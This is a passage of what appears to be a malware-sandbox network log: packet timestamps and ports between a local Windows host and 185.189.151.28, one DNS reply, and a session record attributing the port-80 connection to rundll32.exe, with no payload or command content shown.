May 4, 2022 16:27:54.005554914 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005558968 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005578041 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005594015 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005621910 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005697966 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005723000 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005742073 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005747080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005765915 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005770922 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005779028 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005795002 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005808115 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005812883 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005829096 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005844116 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005853891 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005897999 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005919933 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005958080 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005959034 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.005975008 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.005995989 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006007910 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006391048 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006419897 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006438017 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006474972 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006477118 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006503105 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006515026 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006526947 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006536007 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006551981 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006568909 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006570101 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006594896 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006607056 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006653070 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006700039 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006701946 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006725073 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006738901 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006748915 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006763935 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006772995 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006776094 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006798029 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006812096 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006817102 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.006836891 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006850004 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.006988049 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007011890 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007035971 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007045984 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007060051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007066011 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007082939 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007093906 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007107019 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007117033 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007124901 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007128000 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007148981 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007164955 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007174015 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007186890 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007196903 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007220984 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007229090 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007246017 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007266998 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007271051 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007288933 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007308960 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007361889 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007400990 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007426023 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007448912 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007452965 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007467031 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007505894 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007534981 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007584095 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007607937 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007631063 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007664919 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007689953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007705927 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007713079 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007733107 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007739067 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007755995 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007764101 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007787943 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007791042 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007812023 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007817030 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007834911 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007843018 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007859945 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007864952 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007883072 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007894993 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007900953 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007925987 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007931948 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007940054 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007951021 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007967949 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.007977009 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.007997036 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008001089 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008018970 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008024931 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008049965 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008058071 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008074045 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008074045 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008097887 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008107901 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008119106 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008122921 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008142948 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008143902 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.008167982 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.008192062 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.122081995 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.139204979 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.411616087 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.411673069 CEST | 80 | 49769 | 185.189.151.28 | 192.168.2.4 |
May 4, 2022 16:27:54.411736965 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:27:54.411773920 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
May 4, 2022 16:28:50.846771955 CEST | 49769 | 80 | 192.168.2.4 | 185.189.151.28 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
May 4, 2022 16:27:33.081885099 CEST | 8.8.8.8 | 192.168.2.4 | 0xd133 | No error (0) | | | 13.107.43.16 | A (IP address) | IN (0x0001) |

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49769 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2022 16:27:53.231327057 CEST | 1212 | OUT | |
May 4, 2022 16:27:53.534866095 CEST | 1213 | IN |